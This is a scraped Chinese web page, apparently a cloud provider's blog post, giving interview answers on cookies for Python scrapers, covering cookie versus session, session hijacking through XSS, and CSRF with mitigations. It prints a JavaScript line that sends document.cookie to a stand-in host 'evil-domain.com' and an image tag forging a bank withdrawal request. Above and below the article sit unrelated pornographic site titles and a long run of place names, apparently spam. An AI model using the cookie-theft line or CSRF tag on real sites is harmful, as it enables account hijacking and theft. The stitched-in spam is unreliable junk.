亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

python爬蟲Cookie的面試題示例

發布時間:2020-12-01 09:32:15 來源:億速云 閱讀:127 作者:小新 欄目:編程語言

小編給大家分享一下python爬蟲Cookie的面試題示例,希望大家閱讀完這篇文章后大所收獲,下面讓我們一起去探討吧!

1.Cookie和Session關系

都是為了實現客戶端與服務端交互而產出

Cookie是保存在客戶端,缺點易偽造、不安全

Session是保存在服務端,會消耗服務器資源

Session實現有兩種方式:Cookie和URL重寫

2.Cookie帶來的安全性問題

會話劫持和XSS:在Web應用中,Cookie常用來標記用戶或授權會話。因此,如果Web應用的Cookie被竊取,可能導致授權用戶的會話受到攻擊。常用的竊取Cookie的方法有利用社會工程學攻擊和利用應用程序漏洞進行XSS攻擊。(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;HttpOnly類型的Cookie由于阻止了JavaScript對其的訪問性而能在一定程度上緩解此類攻擊。

跨站請求偽造(CSRF)維基百科已經給了一個比較好的CSRF例子。比如在不安全聊天室或論壇上的一張圖片,它實際上是一個給你銀行服務器發送提現的請求:<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">當你打開含有了這張圖片的HTML頁面時,如果你之前已經登錄了你的銀行帳號并且Cookie仍然有效(還沒有其它驗證步驟),你銀行里的錢很可能會被自動轉走。

解決CSRF的辦法有:隱藏域驗證碼、確認機制、較短的Cookie生命周期等

看完了這篇文章,相信你對python爬蟲Cookie的面試題示例有了一定的了解,想了解更多相關知識,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

昆山市| 商都县| 江川县| 唐海县| 区。| 武强县| 高清| 上虞市| 三江| 洛扎县| 烟台市| 杭州市| 襄汾县| 镇坪县| 休宁县| 株洲县| 镇原县| 会昌县| 禄劝| 涟源市| 长泰县| 五原县| 成都市| 水富县| 如皋市| 饶平县| 昭通市| 新竹市| 唐海县| 礼泉县| 丁青县| 连云港市| 正安县| 江北区| 莒南县| 新兴县| 惠东县| 开鲁县| 广灵县| 姜堰市| 新乐市|